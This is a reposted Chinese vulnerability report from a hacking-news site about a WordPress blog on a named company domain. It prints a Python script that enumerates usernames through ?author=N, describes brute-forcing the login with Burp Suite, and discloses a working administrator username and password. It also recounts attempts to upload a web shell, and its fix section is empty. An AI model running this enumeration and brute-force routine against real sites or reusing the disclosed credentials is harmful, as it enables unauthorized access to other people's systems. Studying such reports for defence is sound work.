记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

十九楼某站内部系统弱口令多个(附测试脚本)

2015-08-18 16:30

漏洞系统http://blog.19ued.com/

使用的是WordPress的博客系统

根据WP的缺陷可以遍历用户名我们就

http://blog.19ued.com/?author=1

...



http://blog.19ued.com/?author=100

为了快速遍历,就为这个wp系统写了一个简单的抓取用户的脚本

code 区域
import sys

import os

import re

import argparse

import urllib2



parser = argparse.ArgumentParser(description="This is a value")

parser.add_argument('--url',action="store",dest="url")

given_args = parser.parse_args()

url = given_args.url





for i in range(1,50):

geturl = url+"?author=%d" % i

print geturl

try:

request = urllib2.urlopen(geturl)

data = request.read()

except urllib2.HTTPError, e:

data = e.read()

p = re.compile(r'<body class="archive author author-(.+?) author-')

matchs = []

matchs = p.findall(data)



for j in matchs:

try:

f = open('username.txt','a+')

f.write('\n')

f.write(j)

except IOError as err:

print("File Error:"+str(err))

finally:

if 'f' in locals():

f.close()

print "The End"



测试截图

19lou1.PNG



得到的用户名

19lou2.PNG



本来爆破也写了脚本的,不过由于有比较好用的burpsuite就用这个工具吧

http://blog.19ued.com/wp-login.php 后台

爆破得到用户名和密码

19lou3.PNG



登陆一下,发现做了403限制,那么我们从首页在进入后台就可以了

利用zhanlijun/123456登陆发现管理员权限



19lou4.PNG



虽然是管理员权限,上传目录都做了不能写入的权限,没法上传那shell了,但是

模板编辑处也没有修改的权限,真是日了狗了,还没有想到其他拿shell的方式,就到这里吧。

漏洞证明:

漏洞证明

19lou3.PNG





19lou4.PNG

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0124465

阅读:70800 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“十九楼某站内部系统弱口令多个(附测试脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云